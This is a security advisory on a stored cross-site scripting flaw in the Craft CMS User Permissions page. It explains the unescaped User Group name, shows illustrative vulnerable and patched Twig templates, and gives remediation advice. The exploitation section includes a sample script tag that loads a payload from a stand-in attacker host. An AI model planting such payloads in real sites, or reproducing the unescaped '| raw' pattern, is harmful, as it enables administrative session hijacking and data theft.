GHSA-G3HP-VVQF-8VW6: Stored Cross-Site Scripting in Craft CMS User Permissions Page

Craft CMS is a popular content management system that provides a robust Control Panel for administrative tasks. Within this Control Panel, the User Permissions page allows administrators to manage access control lists and assign privileges to various user groups. This vulnerability, identified as GHSA-G3HP-VVQF-8VW6, affects the rendering pipeline of this specific administrative interface.

The flaw manifests as a Stored Cross-Site Scripting (XSS) condition, tracked under CWE-79. It occurs because the application fails to properly neutralize user-supplied input when generating the web page. Specifically, the vulnerability is isolated to the display of User Group names within the permissions management view.

While the severity is officially classified as Low due to the required prerequisite privileges, the operational impact involves malicious script execution within an authenticated administrative context. An attacker must possess the ability to manage User Groups to exploit this vulnerability. The required interaction from a higher-privileged user makes this a targeted exploitation vector.

The root cause of this vulnerability lies in the improper handling of untrusted data retrieved from the database during the rendering of the Control Panel DOM. Craft CMS allows users with specific privileges to define custom names for User Groups. These names are stored persistently in the underlying database without strict input validation or sanitization.

When an administrator navigates to the User Permissions page, the application queries the database for all existing User Groups to populate the interface. The templating engine then processes these records to construct the HTML view. During this process, the name attribute of the User Group is injected directly into the document object model.

Because the system omits the necessary HTML-encoding step for this specific field, any HTML or JavaScript payloads embedded within the User Group name are treated as executable code by the browser. The browser cannot distinguish between the legitimate application structure and the injected malicious script. This failure to separate data from the execution context constitutes the core mechanism of the Stored XSS vulnerability.

The vulnerability stems from a common templating oversight where output encoding is explicitly bypassed or inadvertently omitted. In Craft CMS, control panel views are typically rendered using the Twig templating engine. By default, Twig automatically escapes variables, but developers can bypass this using specific filters if they assume the data is safe.

Before the patch, the template responsible for rendering the User Permissions page output the group name dynamically without ensuring context-aware encoding. The official fix notes specify that the bug involved User Group names not being HTML-encoded. This indicates that the rendering logic treated the group name as raw HTML rather than a literal string.

{# Representative Vulnerable Code Pattern #}
<div class="user-group-item">
    <label>
        <input type="checkbox" name="groups[]" value="{{ group.id }}">
        {{ group.name | raw }} {# Vulnerable: Output rendered without encoding #}
    </label>
</div>

The remediation introduced in Craft CMS 5.8.22 enforces proper HTML-encoding for the User Group name prior to rendering. By removing explicit raw output filters or ensuring the variable is passed through standard encoding functions, the application guarantees that special characters are converted to their corresponding HTML entities.

{# Representative Patched Code Pattern #}
<div class="user-group-item">
    <label>
        <input type="checkbox" name="groups[]" value="{{ group.id }}">
        {{ group.name | escape('html') }} {# Patched: Output safely HTML-encoded #}
    </label>
</div>

Exploitation of GHSA-G3HP-VVQF-8VW6 requires a precise sequence of actions and specific preconditions. The attacker must first authenticate to the Craft CMS Control Panel using an account that holds privileges to create or modify User Groups. This initial access acts as the prerequisite for planting the malicious payload within the system.

Once authenticated, the attacker navigates to the User Groups management section and creates a new group or modifies an existing one. They input a malicious JavaScript payload, such as <script src="https://attacker.com/payload.js"></script>, into the User Group Name field. The application accepts this input and stores it persistently in the database.

The secondary phase of the attack relies on user interaction from a targeted administrator. The payload remains dormant until an administrator accesses the User Permissions page, typically while editing a user's account or reviewing system access controls. Upon loading the page, the administrator's browser executes the injected JavaScript within the context of their authenticated session.

The primary impact of this Stored XSS vulnerability is the compromise of the administrative session interacting with the poisoned User Permissions page. Because the injected script executes within the context of the victim's browser, it inherits all the privileges and session tokens associated with that user. This effectively bridges the gap between the attacker's lower privilege level and the victim's administrative access.

An attacker can leverage this execution to perform unauthorized actions silently in the background. The script can issue asynchronous HTTP requests to the Control Panel API, allowing the attacker to create new administrative accounts, alter system configurations, or modify existing content. These actions occur under the guise of the legitimate administrator, complicating forensic attribution.

Furthermore, the vulnerability enables targeted data exfiltration from the Control Panel. The malicious script can read sensitive information displayed on the page, access session identifiers stored in cookies or local storage, and transmit this data to an external server controlled by the attacker. While categorized as a Low severity issue due to the required prerequisites, the successful exploitation yields significant administrative compromise.

The vendor has addressed this vulnerability in the 5.x branch with the release of Craft CMS version 5.8.22. Organizations utilizing Craft CMS must upgrade their installations to this version or later to eliminate the risk. The patch resolves the issue by enforcing correct HTML-encoding on the User Group name during the rendering phase of the User Permissions page.

For environments where immediate patching is not feasible, administrators can implement localized mitigations. Restricting access to the User Groups management feature is a highly effective temporary measure. By auditing the current access control lists and revoking the group management permission from untrusted or lower-tier users, organizations can prevent the injection of new malicious payloads.

Additionally, deploying a strict Content Security Policy (CSP) header can mitigate the execution of unauthorized scripts. A well-configured CSP that prohibits unsafe-inline scripts and restricts external script sources will block the browser from executing the XSS payload, even if it is successfully rendered in the DOM. Security teams should monitor the Aliyun Vulnerability Database for any emerging weaponized exploits targeting this specific code path.